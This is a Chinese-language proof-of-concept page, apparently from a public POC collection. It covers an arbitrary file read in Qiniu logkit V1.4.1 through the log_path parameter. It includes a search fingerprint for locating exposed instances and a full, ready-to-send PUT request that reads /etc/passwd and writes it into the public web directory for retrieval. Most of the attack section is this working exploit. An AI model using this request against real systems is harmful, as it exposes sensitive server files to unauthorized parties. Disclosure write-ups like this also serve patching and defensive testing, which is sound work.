Awesome-POC/Web应用漏洞/七牛云 logkit log_path 任意文件读取漏洞.md

69 lines
1.5 KiB
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# 七牛云 logkit log_path 任意文件读取漏洞
## 漏洞描述
七牛云 logkit log_path 参数可自定义读取服务器文件配合读取的文件写入Web目录将会使攻击者读取到服务器任意文件造成服务器敏感信息泄漏
## 漏洞影响
```
七牛云 logkit V1.4.1
```
## 网络测绘
```
title="七牛Logkit配置文件助手"
```
## 漏洞复现
主页面
![image-20220628115711831](images/202206281157893.png)
发送请求包配置读取文件
```
PUT /logkit/configs/passwdread HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 356
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
{
"name": "passwdread",
"batch_interval": 1,
"collect_interval": 1,
"reader": {
"mode": "file",
"log_path": "/etc/passwd",
"read_from": "oldest",
"datasource_tag": "datasource",
"encoding": "UTF-8"
},
"parser": {
"type": "raw",
"name": "parser",
"timestamp": "true"
},
"transforms": [],
"senders": [
{
"sender_type": "file",
"file_send_path": "/app/public/passwd.log"
}
]
}
```
![image-20220628115730198](images/202206281157267.png)
![image-20220628115736774](images/202206281157819.png)
请求读取的文件 /app/public 目录为Docker默认Web路径写入可读取目标文件
![image-20220628115747872](images/202206281157946.png)